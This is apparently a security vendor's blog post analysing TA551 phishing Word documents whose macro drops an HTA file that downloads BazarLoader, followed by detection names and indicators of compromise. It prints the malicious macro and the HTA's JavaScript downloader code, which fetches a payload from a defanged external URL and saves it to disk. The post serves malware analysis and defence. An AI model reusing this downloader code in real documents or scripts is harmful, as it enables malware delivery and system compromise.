Continuously Changing Malicious Word Macro Being Distributed – Trend of TA551 (2)

The ASEC analysis team is back to continuously introduce DOC macro documents used by the TA551 group in attacks. The operation flow of macro documents hasn’t changed since its introduction in July. However, we have confirmed that in the most recent case, BazarLoader was distributed at the last step after the macro was run.

Figure 1. Operation flow of malicious DOC macro distributed by TA551

First, to quote BazarLoader analysis report published in May by AhnLab:

Excerpt from ATIP – BazarLoader Analysis Report ‘Abstract’

BazarLoader is a malware that downloads and saves a backdoor into the memory and injects it into a normal process. It was developed in C++ language and is usually distributed in the form of an x64 executable file. The malware that BazarLoader downloads is called ‘BazarBackdoor.’ This backdoor collects a user’s PC information and company environment information, and against companies, it downloads a different malware. The analysis of foreign infection cases shows that the malware installs Cobalt Strike to perform lateral movement, collect additional information, and ultimately install ‘Ryuk Ransomware’ or ‘Conti Ransomware’ in a corporate system to demand a ransom. BazarLoader and BazarBackdoor were given the name ‘Bazar’ as they use a C2 domain called *.bazar.

The recently distributed phishing mails didn’t include any special information as shown below, but they did carry a DOC file — compressed and encrypted — as the attachment.

Figure 2. Phishing mail with compressed and encrypted DOC file (1)
Figure 3. Phishing mail with compressed and encrypted DOC file (2)

The DOC filenames that have been distributed since the end of August are shown in the table below. Following up to the most recent distribution trend, the filenames all have the same format of ‘[Specific word].[Date].doc,’ mixing hyphens (-) and commas (,) and distributing various files. Also, unlike the previous distribution, the HTA files that are dropped after the macro in the DOC file is run were all 1.hta files.

Table 1. Word files (*.doc) / HTA / Filenames of additionally downloaded malware
Figure 4. Part of macro code in DOC file (1.hta)

We have also confirmed a change in the HTA file that is dropped when the macro is allowed in the Word file. The way the Word file works is the same as the previous ones. The macro image that is seen in the Word file is the same without any special messages, but upon allowing macro, the HTA file is created based on the text hidden behind the image.

Figure 5. Upon running the Word file
Figure 6. White 1pt text hidden behind the image prompting users to allow macro

The macro code shows that it drops onto C:\ProgramData\1.hta based on the information in the original text in Word. This means that it erases rki9 that is repeatedly found in the original text and creates an HTA file. The second code attached shows a part of the ‘1.hta’ file created following the additional decryption logic. Once the HTA file is run, it downloads additional malware from an external URL that performs as a downloader. This file becomes devDivEx.jpg, which is found at the end of the code.

Sub document_open()
init "c:\programdata\1.hta", Replace(ActiveDocument.Content, "rki9", "")
End Sub
var devDriveDoc = new ActiveXObject('msxml2.xmlhttp');
devDriveDoc.open('GET', 'hxxp://brookscargos[.]com/bmdff/kEMjHpH/npksoRQONwZUsnmvGS2Nl0DvMefQPvsyQ/QECxpCU6vz7EPQJgBj/yixySDbVkH6K5ihCTO9BY3Jj2n/iDiNtaKeMOKMXULwdjN3gnitjUdm6i3OQlLqgqOiz/1tvjGdIcS/iIx9AM3zw9hq6rW3/73053/galax9?q=RuId5tt5BDbkCLPzTeSR&ref=Pt3zxKAEB8&id=PCCEA', false);
devDriveDoc.send();
if (devDriveDoc.status == 200) {
	try {
		var docExDir = new ActiveXObject('adodb.stream');
		docExDir.open;
		docExDir.type = 1;
		docExDir.write(devDriveDoc.responsebody);
		docExDir.savetofile('c:\\users\\public\\devDivEx.jpg', 2);
		docExDir.close;
	} catch (e) {
	}
}

The file downloaded here with the jpg extension was confirmed as BazarLoader DLL. Although the flow of malware could not be simulated because the network where BazarLoader can download additional malware had been disabled, we were able to use the in-house system to understand that it operated by loading Trickbot.

Users should refrain from opening emails from unknown sources, and should not run or enable macro when downloading attachment files. If the security level of the document program is low, the macro may run automatically without any notifications. Therefore, users must maintain the security level high to prevent any unintended features from being run.

Also, we recommend users update the anti-malware engine pattern to its latest version.

AhnLab’s anti-malware product, V3, detects and blocks the types of malicious files introduced in this post (DOC, HTA, DLL, etc.) using the following aliases.

[File Detection]
Downloader/DOC.TA551
Downloader/DOC.TA551.S*
Downloader/MSOffice.Agent
Downloader/HTA.TA551
Trojan/Win.BazarLoader.R440111
Trojan/Win.CryptLoader.R440284

[IOC]
409491f78930a4f26581ebd9a6ecaa2e
bc8073f5646ad6a1bc1be76e556250eb
7ccb728af8c2ce3b5202ce94eaffc770
hxxp://beltmorgand[.]com
hxxp://entiredelivery2014b[.]com
hxxp://povertymanagement2018b[.]com

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

4.7 3 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments